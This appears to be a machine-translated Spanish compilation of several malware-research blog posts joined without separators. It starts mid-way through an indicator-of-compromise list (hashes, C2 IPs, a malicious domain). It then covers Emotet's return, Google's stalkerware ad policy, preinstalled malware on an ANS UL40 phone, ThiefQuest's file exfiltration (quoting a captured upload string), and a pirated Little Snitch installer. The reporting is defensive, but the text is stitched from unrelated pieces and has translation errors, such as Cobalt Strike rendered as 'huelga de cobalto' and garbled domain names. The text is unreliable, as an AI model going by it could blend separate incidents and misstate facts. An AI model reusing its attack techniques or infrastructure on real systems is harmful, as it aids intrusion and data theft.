C&C	T1105	Copia remota de archivos	– certutil.exe: descarga archivos ejecutables de Internet  – cmd.exe: inicia CertUtil para descargar archivos

COI

2a5890aca37a83ca02c78f00f8056e20d9b73f0532007b270dbf99d5ade59e2a Boris Johnson se compromete a admitir 3 millones desde Hong Kong a UKdocx

fc885b50892fe0c27f797ba6670012cd3bbd5dc66f0eb8fdd1b5fca9f1ea98cc BNOHK.docx.zip

3b93bc1e0c73c70bc8f314f2f11a91cf5912dab4c3d34b185bd3f5e7dd0c0790 Boris_Johnson_Pledges_to_Admit_3_Million_From_Hong_Kong_to_U.K.rar

ecf63a9430a95c34f85c4a261691d23f5ac7993f9ac64b0a652110659995fc03 Email security check.rar

1e9c91e4125c60e5cc5c4c6ef8cbb94d7313e20b830a1e380d5d84b8592a7bb6 Correo electrónico de verificación de seguridad.docx

3a04c1bdce61d76ff1a4e1fd0c13da1975b04a6a08c27afdd5ce5c601d99a45b ADIN.docx (storm.sct)

855af291da8120a48b374708ef38393e7c944a8393880ef51352ce44e9648fd8 ADIN.docx (storm.sct)

1e81fb62cb57a3231642f66fee3e10d28a7c81637e4d6a03515f5b95654da585 ff.exe (storm.txt)

99aee7ae27476f057ef3131bb371a276f77a526bb1419bfab79a5fac0582b76a huelga de cobalto

flash.governmentmm.com : este dominio utilizado por el actor para alojar plantillas remotas. Ha sido registrado hace 3 meses por alguien en Estados Unidos.

Muestras de MgBot

2310f3d779acdb4881b5014f4e57dd65b4d6638fd011ac73e90df729b58ae1e0
e224d730e66931069d6760f2cac97ab0f62d1ed4ddec8b58783237d3dcd59468
5b0c93a70032d80c1f5f61e586edde6360ad07b697021a83ed75481385f9f51f
1e81fb62cb57a3231642f66fee3e10d28a7c81637e4d6a03515f5b95654da585
07bb016c3fde6b777be4b43f293cacde2d3aae0d4e4caa15e7c66835e506964f
7bdfabdf9a96b3d941f90ec124836084827f6ef06fadf0dce1ae35c2361f1ac6
8ab344a1901d8129d99681ce33a76f7c64fd95c314ac7459c4b1527c3d968bb4
f41bfc57c2681d94bf102f39d4af022beddafb4d49a49d7d7c1901d14eb698d2

45.77.245 [.] 0: Esta IP ha sido utilizada por Cobalt Strike como un servidor de C&C.

42.99.116 [.] 225 : servidor C&C utilizado por la carga útil final.

Muestras de Android

b5304a0836baf1db8909128028793d12bd418ff78c69dc6f9d014cadede28b77
9aade1f7a1f067688d5da9e9991d3a66799065ffe82fca7bb679a71d89fec846
5f7f87db34340ec83314313ec40333aebe6381ef00b69d032570749d4cedee46

Nunca se trató de «si» sino de «cuándo». Después de cinco meses de ausencia, el temido Emotet ha regresado. Después de varias falsas alarmas en las últimas semanas, se vio por primera vez una campaña de spam el 13 de julio que mostraba signos de un probable regreso.

Las botnets Emotet comenzaron a impulsar el malspam activamente el viernes 17 de julio, utilizando las mismas técnicas que emplearon anteriormente. Los correos electrónicos maliciosos contienen una URL o un archivo adjunto. Una técnica familiar es que el documento se envíe como respuesta dentro de los hilos de correo electrónico existentes.

El documento contiene una macro muy ofuscada:

Una vez que la macro está habilitada, WMI lanza PowerShell para recuperar el binario Emotet de uno de los sitios web remotos comprometidos. Recorrerá una lista hasta que identifique una que responda.

Una vez que se ejecuta la carga útil, enviará una confirmación a uno de los servidores de comando y control de Emotet.

Emotet ha vuelto a sus viejos trucos.

El troyano Emotet fue, con mucho, la amenaza más visible y activa en nuestros radares en 2018 y 2019 , hasta que entró en un descanso prolongado.

Emotet es utilizado por los ciberdelincuentes como el punto de entrada inicial, seguido de un tiempo de permanencia que puede durar días o semanas. Mientras tanto, otras amenazas como TrickBot se pueden entregar como carga secundaria.

El daño real que causa un compromiso de Emotet ocurre cuando forma alianzas con otras pandillas de malware y, en particular, con actores de amenazas interesados ​​en dejar caer el ransomware.

Los usuarios de Malwarebytes ya estaban protegidos contra Emotet gracias a nuestra tecnología anti-exploit sin firma.

También detectamos el binario Emotet como un archivo independiente:

Indicadores de compromiso

Documentos maliciosos

5d2c6110f2ea87a6b7fe9256affbac0eebdeee18081d59e05df4b4a17417492b
4fdff0ebd50d37a32eb5c3a1b2009cb9764e679d8ee95ca7551815b7e8406206
bb5602ea74258ccad36d28f6a5315d07fbeb442a02d0c91b39ca6ba0a0fe71a2
6d86e68c160b25d25765a4f1a2f8f1f032b2d5cb0d1f39d1d504eeaa69492de0
18fab1420a6a968e88909793b3d87af2e8e1e968bf7279d981276a2aa8aa678e
d5213404d4cc40494af138f8051b01ec3f1856b72de3e24f75aca8c024783e89

Sitios comprometidos

elseelektrikci [.] com
rviradeals [.] com
skenglish [.] com
packersmoversmohali [.] com
tri-comma [.] com
ramukakaonline [.] com
shubhinfoways [.] com
test2.cxyw [.] net Sustainableandorganicgarments
[.] com
puesta en escena .icuskin [.] com
fivestarcleanerstx [.] com
bhandaraexpress [.] com
crm.shaayanpharma [.] com
zazabajouk [.] com
e2e-solution [.] com
topgameus [.] com
cpads [.] net
tyres2c [.] com
thesuperservice [.] com
ssuse [.] com

Binarios Emotet

454d3f0170a0aa750253d4bf697f9fa21b8d93c8ca6625c935b30e4b18835374
d51073eef56acf21e741c827b161c3925d9b45f701a9598ced41893c723ace23
1368a26328c15b6d204aef2b7d493738c83fced23f6b49fd8575944b94bcfbf4
7814f49b3d58b0633ea0a2cb44def98673aad07bd99744ec415534606a9ef314
f04388ca778ec86e83bf41aa6bfa1b163f42e916d0fbab7e50eaadc8b47caa50

C2s

178.210.171 [.] 15
109.117.53 [.] 230
212.51.142 [.] 238
190.160.53 [.] 126

El viernes 10 de julio, Google anunció que ya no permitiría la publicidad de spyware y tecnología de vigilancia similar, a menudo denominada «stalkerware», en su plataforma.

El cambio es un paso bienvenido por una de las compañías más grandes y poderosas en publicidad en línea, pero una lectura atenta de la política revela una posible laguna que podría permitir que los fabricantes de aplicaciones de tipo stalkerware sigan publicitando sus productos en Google. En pocas palabras, estas compañías podrían eludir las reglas cambiando la cara de lo que están vendiendo, sin cambiar la tecnología central dentro.

Esperamos que esta excepción se aborde pronto.

Durante más de un año, Malwarebytes ha cobrado por adelantado un compromiso renovado para proteger a los usuarios y a los sobrevivientes de abuso doméstico de las amenazas que representa el stalkerware. Estas aplicaciones pueden dar a las personas la oportunidad de entrometerse en mensajes de texto, correos electrónicos y registros de llamadas, buscar a través de la navegación web y el historial de ubicación GPS, y revelar fotos sensibles, videos y actividad en redes sociales, todo sin consentimiento.

En nuestra defensa para proteger a los usuarios de estas amenazas, hemos hablado directamente con los sobrevivientes de abuso doméstico. Hemos brindado capacitaciones en seguridad de dispositivos a organizaciones locales de apoyo al abuso doméstico y centros de justicia familiar. Nos hemos reunido con funcionarios dedicados de aplicación de la ley. Ayudamos a lanzar la Coalición contra Stalkerware como socio fundador . Hemos contribuido a estudios de investigación y hemos aumentado nuestras propias detecciones para nuestras dos categorías internas de aplicaciones que proporcionan capacidades para espiar la actividad del usuario sin consentimiento: aplicaciones de «monitoreo» y aplicaciones de «spyware».

A través de nuestro trabajo continuo, hemos aprendido que una de las formas en que las aplicaciones de tipo stalkerware evitan el escrutinio es a través de campañas de marketing potencialmente engañosas que se califican como herramientas seguras para el monitoreo parental. Es lamentable que estas mismas tácticas puedan resultar efectivas para eludir la nueva política de Google.

El cambio, la excepción y el problema.

Según Google, la política publicitaria actualizada de la compañía «prohibirá la promoción de productos o servicios que se comercialicen o apunten con el propósito expreso de rastrear o monitorear a otra persona o sus actividades sin su autorización». La política actualizada entrará en vigencia el 11 de agosto de 2020.

Al responder una pregunta sobre por qué Google decidió anunciar esta actualización, un portavoz dijo: “Evaluamos y actualizamos constantemente nuestras políticas publicitarias para asegurarnos de proteger a los usuarios. Actualizamos rutinariamente nuestro idioma con ejemplos para ayudar a aclarar lo que consideramos una violación de la política. La tecnología de software espía para la vigilancia de socios siempre estuvo en el alcance de nuestras políticas contra el comportamiento deshonesto «.

La política actualizada se aplica a «el software espía y la tecnología utilizados para la vigilancia de la pareja íntima, incluidos, entre otros, el software espía / malware que puede utilizarse para monitorear mensajes de texto, llamadas telefónicas o historial de navegación; Rastreadores GPS comercializados específicamente para espiar o rastrear a alguien sin su consentimiento «. y «promoción de equipos de vigilancia (cámaras, grabadoras de audio, cámaras de tablero, cámaras de niñera) comercializados con el expreso propósito de espiar».

La lista no exhaustiva captura algunos de los tipos actuales de herramientas invasivas disponibles en la actualidad. Pero más abajo en su actualización de políticas, Google explicó que hay excepciones a la nueva regla. La política no se aplicará a los «servicios de investigación privados» o «productos o servicios diseñados para que los padres rastreen o controlen a sus hijos menores de edad».

El problema, como informamos hace casi un año en Malwarebytes Labs , es que la línea entre las aplicaciones de tipo stalkerware y las aplicaciones de monitoreo parental puede ser borrosa.

Como escribimos antes:

«Emory Roane, asesor político de Privacy Rights Clearinghouse, dijo que, no solo las capacidades técnicas de las aplicaciones stalkerware y las aplicaciones de monitoreo parental son muy similares, sino que las capacidades en sí mismas se pueden encontrar dentro del tipo de herramientas de piratería utilizadas por los estados nacionales.

‘Si nos fijamos en las capacidades: ¿qué resultados se pueden obtener de los dispositivos implantados con stalkerware versus dispositivos pirateados por los estados nacionales? Es lo mismo ‘, dijo Roane. ‘Encender y apagar el dispositivo de forma remota, registradores de teclas, seguimiento a través de GPS, todo esto’ «.

Lo que es más, a veces, las aplicaciones que anteriormente se comercializaban como herramientas para espiar potencialmente a parejas y cónyuges románticos, pueden cambiar rápidamente y enmascararse como aplicaciones de monitoreo parental.

Erica Olsen, directora del proyecto Safety Net para la Red Nacional para Terminar con la Violencia Doméstica, dijo que ella personalmente vio estas tácticas de «cambio de marca» cuando el entonces senador Al Franken introdujo una legislación para prohibir el uso de aplicaciones que podrían revelar la ubicación GPS de una persona sin su conocimiento o consentimiento

«Después de las audiencias legislativas públicas que Al Franken realizó sobre aplicaciones basadas en la ubicación y productos de acecho, una tonelada de ellas cambió su comercialización casi de la noche a la mañana», dijo Olsen, quien también compartió que la política actualizada de Google es un movimiento en la dirección correcta. “Mostramos imágenes grandes y ampliadas de su marketing problemático y lo eliminaron. Pero no cambiaron la funcionalidad básica de las aplicaciones que les permitieron ser utilizadas para estos comportamientos. Eso dijo mucho.

El año pasado, Twitter permitió tweets patrocinados que anunciaban una aplicación que puede rastrear registros de llamadas, mensajes de texto, ubicación de GPS, historial de navegación web y actividad de redes sociales, y revelar fotos y videos sensibles. El anuncio retrataba a un hombre acostado en la cama, revisando su teléfono. Escrito en el anuncio estaban las palabras: «¿Qué se está escondiendo de ti?»

Twitter retiró el anuncio después de que los usuarios se indignaron. Según VICE, Twitter explicó su eliminación diciendo: «La aplicación viola nuestra  Política de descarga de software y malware y  ya no se le permitirá anunciar en la plataforma».

Este fue un movimiento rápido de Twitter, pero hoy, esa misma aplicación se comercializa en su propio sitio web como una herramienta para el monitoreo parental.

El viernes, el escritor de seguridad informática Graham Cluley planteó los mismos problemas que estamos planteando aquí: que algunas aplicaciones de tipo stalkerware aún pueden anunciarse en Google, simplemente cambiando su estrategia publicitaria.

«Lamentablemente, dudo que la prohibición de anuncios de Google impida que las aplicaciones de stalkerware se promocionen a sí mismas», escribió Cluley , «es solo que tal vez ya no puedan ser tan explícitos en sus anuncios en línea sobre cómo es más probable que se usen».

Próximos pasos contra el stalkerware

Como socio fundador de la Coalición contra Stalkerware, Malwarebytes entiende que las amenazas de stalkerware son multifacéticas, y responder a estas amenazas requiere un apoyo interdisciplinario. Eso incluye el compromiso de las plataformas de anunciantes en línea de eliminar espacios para empresas que anuncian deliberadamente el potencial de la privacidad como una característica del producto.

A pesar de la exclusión de la política publicitaria actualizada de Google, la intención general de la compañía aquí es buena.

Nuestro compromiso de proteger a los usuarios de estas amenazas de las aplicaciones de tipo stalkerware continúa. Damos la bienvenida a otros a unirse.

Hemos descubierto, una vez más, otro modelo de teléfono con malware preinstalado proporcionado por el programa Lifeline Assistance a través de Assurance Wireless de Virgin Mobile. Esta vez, un ANS (American Network Solutions) UL40 con sistema operativo Android 7.1.1.  

Después de que escribiéramos en enero: » los teléfonos financiados por el gobierno de los Estados Unidos vienen preinstalados con malware inamovible «, escuchamos una protesta de los clientes de Malwarebytes. Algunos afirmaron que varios modelos de teléfonos ANS estaban experimentando problemas similares al UMX (Unimax) U683CL . Sin embargo, es muy difícil verificar tales casos sin tener físicamente el dispositivo móvil a mano. Por esta razón, no pude escribir con confianza sobre tales casos públicamente. Afortunadamente, teníamos un cliente de Malwarebytes comprometido a probar su caso. ¡Gracias al patrocinador de Malwarebytes, Rameez H. Anwar, por enviarnos su ANS UL40 para futuras investigaciones! ¡Su experiencia en seguridad cibernética y su persistencia en este caso seguramente ayudarán a otros!

Aclaración de disponibilidad

Para aclarar, no está claro si el teléfono en cuestión, el ANS UL40, está disponible actualmente por Assurance Wireless. Sin embargo, el Manual del usuario de ANS UL40 aparece en la lista (al momento de escribir este artículo) en el sitio web de Assurance Wireless.

Por lo tanto, solo podemos suponer que todavía está disponible para los clientes de Assurance Wireless. En cualquier caso, el ANS UL40 se vendió en algún momento y algunos clientes aún podrían verse afectados.

Tipos de infección

Al igual que el UMX U683CL, el ANS UL40 viene infectado con una aplicación de configuración comprometida y una aplicación de actualización inalámbrica . Aunque esto puede ser cierto, que están no infectadas con las mismas variantes de malware. Las infecciones son similares pero tienen sus propias características de infección únicas. Aquí hay un resumen de las aplicaciones infectadas.

Configuraciones

• Nombre del paquete: com.android.settings
• MD5: 7ADA4AAEA49383499B405E4CE0A9447F
• Nombre de la aplicación: Configuración
• Detección: Android / Trojan.Downloader.Wotby.SEK

La aplicación de configuración es exactamente lo que parece: es la aplicación de sistema requerida que se utiliza para controlar todas las configuraciones del dispositivo móvil. Por lo tanto, eliminarlo dejaría el dispositivo inutilizable. Para el caso del ANS UL40, está infectado con Android / Trojan.Downloader.Wotby.SEK.

La prueba de infección se basa en varias similitudes con otras variantes de Downloader Wotby. Aunque la aplicación de configuración infectada está muy ofuscada, pudimos encontrar un código malicioso idéntico. Además, comparte el mismo nombre de receptor: com.sek.y.ac; nombre del servicio: com.sek.y.as ; y nombres de actividad: com.sek.y.st , com.sek.y.st2 y com.sek.y.st3 . Algunas variantes también comparten un archivo de texto que se encuentra en su directorio de activos llamado wiz.txt. Parece ser una lista de «aplicaciones principales» para descargar desde una tienda de aplicaciones de terceros. Aquí hay un fragmento de código del archivo de texto.

Para ser justos, no se activó ninguna actividad maliciosa desde esta aplicación de configuración infectada . Esperábamos ver algún tipo de notificación o ventana emergente del navegador con información del código que se muestra arriba. Lamentablemente, eso nunca sucedió. Pero tampoco pasamos la cantidad de tiempo normal que un usuario típico pasaría en el dispositivo móvil. Tampoco se instaló una tarjeta SIM en el dispositivo, lo que podría afectar el comportamiento del malware. Sin embargo, hay pruebas suficientes de que esta aplicación de configuración tiene la capacidad de descargar aplicaciones de una tienda de aplicaciones de terceros. Esto no esta bien. Por esta razón, la detección se mantiene.

Aunque es inquietante, es importante tener en cuenta que las aplicaciones de la tienda de aplicaciones de terceros parecen estar libres de malware. Esto se verificó mediante la descarga manual de un par de nosotros mismos para su análisis. Eso no quiere decir que las versiones maliciosas no se puedan cargar en una fecha posterior. Tampoco verificamos cada muestra. Sin embargo, creemos que el conjunto de muestras que verificamos es válido para otras aplicaciones en el sitio. En esas circunstancias, incluso si la aplicación de configuración de ANS había descargado una aplicación de la lista, todavía no es tan nefasta como la aplicación de configuración que se ve en el UMX U683CL.

Actualización inalámbrica

• Nombre del paquete: com.fota.wirelessupdate
• MD5: 282C8C0F0D089E3CD522B4315C48E201
• Nombre de la aplicación: WirelessUpdate
• Detecciones: tres variantes de Android / PUP.Riskware.Autoins.Fota
  • Variantes .INS, .fscbv y .fbcv

WirelessUpdate se clasifica como un instalador automático de software de riesgo de programa potencialmente no deseado (PUP) que tiene la capacidad de instalar aplicaciones automáticamente sin el consentimiento o conocimiento del usuario. También funciona como la fuente principal del dispositivo móvil para actualizar parches de seguridad, actualizaciones del sistema operativo, etc.

Android / PUP.Riskware.Autoins.Fota en particular es conocido por instalar varias variantes de Android / Trojan.HiddenAds, ¡ y de hecho lo hizo! De hecho, ¡instaló automáticamente cuatro variantes diferentes de HiddenAds como se ve a continuación!

• Nombre del paquete: com.covering.troops.merican
• MD5: 66C7451E7C87AD5145596012C6E9F9A0
• Nombre de la aplicación: Merica
• Detección: Android / Trojan.HiddenAds.MERI

• Nombre del paquete: com.sstfsk.cleanmaster
• MD5: 286AB10A7F1DDE7E3A30238D1D61AFF4
• Nombre de la aplicación: Clean Master
• Detección: Android / Trojan.HiddenAds.BER

• Nombre del paquete: com.sffwsa.fdsufds
• MD5: 4B4E307B32D7BB2FF89812D4264E5214
• Nombre de la aplicación: belleza
• Detección: Android / Trojan.HiddenAds.SFFW

• Nombre del paquete: com.slacken.work.mischie
• MD5: 0FF11FCB09415F0C542C459182CCA9C6
• Nombre de la aplicación: Mischi
• Detección: Android / Trojan.HiddenAds.MIS

Verificación de caída de carga útil

Ahora puede que se pregunte: «¿Cómo verificó cuál de las dos aplicaciones de sistema infectadas preinstaladas está dejando caer las cargas?» El proceso funciona de la siguiente manera. Deshabilita uno de ellos al configurar inicialmente el dispositivo móvil. En los casos UMX y ANS, elegir cuál deshabilitar fue fácil de decidir. Esto se debe a que la desactivación de la aplicación de configuración hace que el teléfono quede inutilizable. Entonces, deshabilitar WirelessUpdate fue la opción obvia en ambos casos. El siguiente paso en el proceso es esperar un par de semanas para ver si sucede algo. Y sí, a veces necesita esperar tanto tiempo para que el malware deje caer las cargas útiles. Si no sucede nada después de un par de semanas, es hora de volver a habilitar la aplicación del sistema infectado nuevamente y comenzar el juego de espera nuevamente.

Usando este proceso, descubrimos que en el caso del UMX U683CL , la aplicación de configuración era la culpable. Para el ANS UL40, después de no ver ninguna carga útil caída durante semanas, volví a habilitar WirelessUpdate. ¡En 24 horas, instaló las cuatro variantes de HiddenAds! Atrapado con las manos en la masa, WirelessUpdate !

El lazo entre UMX y ANS

Con nuestros hallazgos, imaginamos que algunos se preguntan: ¿Es esto una correlación o una coincidencia? Sabemos que tanto los dispositivos móviles UMX como ANS tienen las mismas aplicaciones de sistema infectadas. Sin embargo, las variantes de malware en el modelo U683CL y UL40 son diferentes. Como resultado, inicialmente no pensé que hubiera vínculos entre las dos marcas. Lo resumí como una coincidencia en lugar de una correlación. Eso es hasta que me topé con evidencia que sugiere lo contrario. 

La aplicación de configuración que se encuentra en el ANS UL40 está firmada con un certificado digital con el nombre común de teleepoch. Al buscar teleepoch aparece la empresa TeleEpoch Ltd junto con un enlace a su sitio web. Allí mismo, en la página de inicio de TeleEpoch Ltd, se afirma que Teleepoch registró la marca «UMX» en los Estados Unidos. 

Revisemos. Tenemos una aplicación de configuración que se encuentra en un ANS UL40 con un certificado digital firmado por una empresa que es una marca registrada de UMX. Para el marcador, eso es dos diferentes ajustes aplicaciones con software malicioso dos variantes diferentes en dos teléfonos diferentes fabricantes y modelos que aparecen a todos de vuelta a la corbata Teleepoch Ltd . Además, hasta ahora, las únicas dos marcas que tienen malware preinstalado en la aplicación Configuración a través del programa Lifeline Assistance son ANS y UMX.

Esto me llevó a investigar más sobre la correlación observando casos en nuestro sistema de soporte de otros modelos ANS que podrían haber preinstalado malware. Fue entonces cuando encontré el ANS L51. Para el registro, el L51 fue otro modelo que se jactó de haber preinstalado malware en los comentarios del artículo de UMX en enero. ¡Descubrí que el ANS L51 tenía las mismas variantes de malware exactas que el UMX U683CL! Allí, dentro de los tickets de soporte anteriores, había una prueba de que el ANS L51 estaba infectado con Android / Trojan.Dropper.Agent.UMX y Android / PUP.Riskware.Autoins.Fota.fbcvd. ¡Conduciendo a casa la clasificación de TeleEpoch, UMX y la correlación ANS! 

Soluciones

Tenemos la máxima fe en que ANS encontrará rápidamente una solución a este problema. Al igual que UMX hizo lo que se indica en la sección ACTUALIZACIÓN: 11 de febrero de 2020 de la escritura de enero. Como aspecto positivo , no encontramos que la aplicación de Configuración en el ANS sea tan viciosa como en el UMX. Por lo tanto, la urgencia no es tan severa esta vez.

Mientras tanto, los usuarios frustrados con ANS UL40 pueden detener la reinfección de HiddenAds utilizando este método para desinstalar WirelessUpdate para el usuario actual (detalles en el siguiente enlace):

Instrucciones de eliminación para Adups

Advertencia: asegúrese de leer Restaurar aplicaciones en el dispositivo (sin restablecimiento de fábrica) en el raro caso de que necesite revertir / restaurar la aplicación. Por ejemplo, si desea restaurar WirelessUpdate para verificar si hay actualizaciones importantes del sistema.

Use este / estos comando (s) durante el paso 7 en Desinstalar Adups a través de la línea de comando ADB para eliminar:

adb shell pm uninstall -k –user 0 com.fota.wirelessupdate

El presupuesto no debe ser equivalente a malware

Hay compensaciones al elegir un dispositivo móvil económico. Algunas compensaciones esperadas son el rendimiento, la duración de la batería, el tamaño de almacenamiento, la calidad de la pantalla y la lista de otras cosas para que un dispositivo móvil se ilumine en la billetera. 

Sin embargo, el presupuesto nunca debe significar comprometer la seguridad de uno con malware preinstalado

Nota del editor: el nombre original del malware, EvilQuest, ha cambiado debido a un juego legítimo del mismo nombre a partir de 2012. El nuevo nombre, ThiefQuest, también es más adecuado para nuestra comprensión actualizada del malware.

El malware ThiefQuest , que se descubrió la semana pasada, puede no ser realmente ransomware según los nuevos hallazgos. Los comportamientos que se han documentado hasta ahora siguen siendo precisos, pero ya no creemos que el rescate sea el objetivo real de este malware.

¿Por qué? Esa es una gran pregunta, y ha habido varias migas de pan que nos han llevado a esta conclusión.

Comportamiento improbable de rescate

La presencia de keylogging y código de puerta trasera , descubierta por Patrick Wardle, es inusual en el ransomware. Inédito en Mac, realmente, pero no hemos visto mucho ransomware en este lado de la calle. Este descubrimiento indicó que había algo extraño en esta amenaza.

También hay varias pistas que quedan a la derecha en la nota de rescate:

• 

La primera pista es que el precio de descifrado es de $ 50 USD. Ese es un precio extrañamente bajo, y en USD en lugar de Bitcoin, y se esperaría que la víctima calcule la cantidad correcta de Bitcoin al tipo de cambio en ese momento. Sin embargo, esto por sí solo no es prueba de nada.

Lawrence Abrams , de Bleeping Computer, que tiene más experiencia con ransomware en el mundo de Windows, notó otro hallazgo que la mayoría de los investigadores de Mac que estaban investigando. No se proporcionó una dirección de correo electrónico en la nota de rescate, por lo que no hay forma de ponerse en contacto con los delincuentes detrás del malware para obtener su clave de descifrado, y tampoco hay manera de que se comuniquen con usted.

Además, cuando se compararon las notas de rescate obtenidas de diferentes sistemas, se descubrió que la dirección de Bitcoin dada es la misma para todos. Esto significa que no habría forma de que los delincuentes verifiquen quién pagó el rescate.

Finalmente, aunque hay una rutina de descifrado en el malware, los hallazgos de Patrick Wardle mostraron que no se llamó en ninguna parte del código del malware, lo que significa que la función está huérfana y nunca se ejecutará.

Esto, más la extraña reticencia mostrada por el malware para encriptar cualquier cosa, sugiere que el rescate es simplemente una distracción. (Solo pude cifrar archivos una vez, y esa no fue la misma instalación donde el malware me gritaba cada cinco minutos que había cifrado mis archivos cuando en realidad no lo había hecho).

Mientras miraba la actividad de red desde una instalación activa de ThiefQuest, noté que estaba haciendo literalmente cientos de conexiones al servidor de comando y control (C2) rápidamente.

Como un mago, distrayendo su ojo con una mano mientras la otra realiza un poco de mano, este malware parece estar haciendo mucho ruido para cubrir lo que ahora creemos que es su verdadero objetivo: la exfiltración de datos.

Exfiltración?

Para aquellos que no están familiarizados con el término, la exfiltración de datos es simplemente un robo de datos. Se utiliza para referirse al acto de malware que recopila datos de una máquina infectada y los envía a un servidor bajo el control del atacante.

En el caso de ThiefQuest, había un script de Python que se soltó en el sistema, pero no de manera confiable. (No lo obtuve en todas las instalaciones). Ese script se usó para filtrar datos.

Este script explora todos los archivos de la /Users/carpeta (la carpeta que contiene todos los datos de usuario para todos los usuarios de la computadora) en busca de cualquier archivo que tenga ciertas extensiones, como .pdf, .doc, .jpg, etc. Algunas extensiones en particular indican puntos de interés para el malware, como .pem, utilizado para claves de cifrado, y .wallet, utilizado para billeteras de criptomonedas.

Esos archivos luego se cargan a través de HTTP sin cifrar, uno tras otro. El examen de los paquetes de red mostró que contenían una cadena con dos piezas de información: una ruta de archivo y una cadena aleatoria de caracteres.

c = VGhpcyBpcyBhIHRlc3QK & f =% 2FUsers% 2Ftest% 2FDocuments% 2Fpasswords.doc

El archivo passwords.doc al que se refiere fue un archivo señuelo que contenía el texto «Esta es una prueba». La cadena aparentemente aleatoria VGhpcyBpcyBhIHRlc3QK, es una cadena codificada en base64 que, cuando se decodifica, muestra el contenido del archivo.

Por lo tanto, el malware exfiltraba cientos de archivos a través de HTTP sin cifrar.

Entonces, ¿qué es este malware de Mac?

Según Abrams, dicho malware en el mundo de Windows se conoce como un «limpiador». Este tipo de malware a menudo está destinado a robar datos y borrar el sistema, en parte o en su totalidad, para cubrir sus huellas.

Por lo general, se implementa un limpiador en ataques dirigidos contra una organización en particular. A veces, como ha sido el caso con el malware, como el infame NotPetya, ese malware se extenderá más allá del objetivo, o puede propagarse intencionalmente ampliamente para ocultar quién es el objetivo.

En este punto, no hay indicios de que este sea un ataque dirigido. Hasta ahora, también está en todo el tablero, con avistamientos aleatorios en todo el mundo.

Hay alguna indicación de que esto puede ser solo una prueba de concepto (PoC), como el siguiente comentario en un script de Python asociado con el malware:

# n__ature comprobación de PoC
# TODO: los PoC son geniales, pero esto
# entrega mucho mejor cuando se implementa en
# producción

Siempre soy reacio a creer lo que me dice una pieza de malware. Esto puede ser una pista falsa, o puede ser un comentario antiguo que nunca se eliminó, o tal vez ese script Python en sí mismo es el PoC. Aún así, la aparente falta de pulido en este malware podría significar que no estaba realmente listo para su lanzamiento.

Capacidades adicionales

Como se mencionó anteriormente, este malware también parece incluir código para el registro de teclas y para abrir una puerta trasera para brindarle al atacante acceso prolongado a su Mac. Esto es inusual para el ransomware, pero no es realmente inusual para nuestra nueva comprensión del malware.

Sin embargo, más inesperado es el hecho de que el malware parece incluir código que se comporta como la definición de virus de un libro de texto, algo que no se ha visto en Mac desde el cambio de System 9 a Mac OS X 10.0.

Anteriormente notamos que el malware se inyectó en algunos archivos relacionados con la Actualización de software de Google, y encontramos esto bastante desconcertante, ya que Google Chrome detectará los cambios y reemplazará los archivos manipulados con archivos limpios. Sin embargo, los nuevos hallazgos sobre el comportamiento viral de Patrick Wardle revelaron más información sobre cómo está sucediendo esto.

Un virus es un tipo específico de malware que agrega código malicioso a aplicaciones o ejecutables legítimos, como una forma de propagar o reinfectar una máquina.

El malware realmente buscará en la carpeta / Users / buscando archivos ejecutables. Cuando encuentre uno, antepondrá un código malicioso al comienzo del archivo. Esto significa que cuando se ejecuta el archivo, el código malicioso se ejecuta primero. Ese código copiará el contenido del archivo legítimo en un archivo nuevo e invisible y lo ejecutará.

El acto de reemplazar o modificar un archivo legítimo con uno malicioso, y luego ejecutar un código legítimo para que parezca que no pasa nada, no es nuevo en macOS. De hecho, el primer ransomware Mac real, KeRanger, se propagó a través de una copia modificada de la aplicación de transmisión torrent. El atacante modificó la transmisión y luego pirateó el sitio web de la transmisión para difundir la versión envenenada de la aplicación.

Sin embargo, hasta ahora, esto lo había hecho manualmente un atacante para modificar una aplicación legítima para distribución maliciosa. El malware no ha hecho esto de manera automatizada desde los días del Sistema 1 al Sistema 9, cuando se vieron los virus Mac por última vez.

¿Qué debo hacer si estoy infectado?

La intención del malware no cambia su eliminación, y Malwarebytes para Mac aún eliminará todos los componentes conocidos del malware.

Sin embargo, hay algunas otras consideraciones. Es completamente posible que los archivos ejecutables en una Mac infectada puedan haber sido modificados maliciosamente, y estos cambios pueden no ser detectados por el software antivirus. Incluso si lo son, la eliminación de esos archivos puede causar daños en el software de su sistema. Por lo tanto, debido a este peligro y al probable daño a los datos del usuario, puede ser prudente restaurar un sistema infectado a partir de copias de seguridad en lugar de tratar de desinfectarlo.

Recuperarse del robo de datos puede ser más difícil, en algunos aspectos, que recuperarse del ransomware. Si tiene buenas copias de seguridad, recuperarse del ransomware es relativamente fácil. ¡Sin embargo, no hay que recuperar datos robados!

Si estaba infectado, pase un tiempo pensando en los datos que tiene que pueden haber sido robados. Cómo responde depende de los datos. Si tenía tarjetas de crédito en los datos de su carpeta de usuario, puede considerar cancelarlas. Si había información personal confidencial, como números de seguro social, considere bloquear su crédito con las agencias de crédito. Si tenía contraseñas, cámbielas siempre que las use.

Sin embargo, en última instancia, la información personal que ha sido robada está para siempre en otras manos. En casos de información vergonzosa o perjudicial que se filtró, no hay recuperación. Si el atacante decide hacer algo malicioso con eso, chantaje, por ejemplo, no puede protegerse.

Por lo tanto, es mejor no confiar en el cifrado de FileVault en su disco duro. Eso es excelente para proteger sus datos si su Mac es robada, pero no tanto contra el malware que se ejecuta en la máquina. Si tiene datos altamente confidenciales, asegúrese de que estén encriptados independientemente de alguna manera. La prevención es siempre la mejor protección.

Nota del editor: el nombre original del malware, EvilQuest, ha cambiado debido a un juego legítimo del mismo nombre desde 2012. El nuevo nombre es OSX.ThiefQuest.

Un usuario de Twitter llamado @beatsballert me envió un mensaje ayer después de enterarse de un instalador de Little Snitch aparentemente malicioso disponible para descargar en un foro ruso dedicado a compartir enlaces de torrents. Una publicación ofreció una descarga de torrents para Little Snitch, y pronto le siguieron varios comentarios de que la descarga incluía malware. De hecho, descubrimos que no solo era malware, sino una nueva variante de ransomware para Mac que se propagaba a través de la piratería.

Instalación

El análisis de este instalador mostró que definitivamente estaba sucediendo algo extraño. Para comenzar, el instalador legítimo de Little Snitch está empaquetado de forma atractiva y profesional, con un instalador personalizado bien hecho que está debidamente firmado por código. Sin embargo, este instalador era un simple paquete de instalación de Apple con un ícono genérico. Peor aún, el paquete de instalación se distribuyó sin sentido dentro de un archivo de imagen de disco.

El examen de este instalador reveló que instalaría lo que resultó ser las aplicaciones legítimas de instalación y desinstalación de Little Snitch, así como un archivo ejecutable llamado «parche», en el /Users/Shared/directorio.

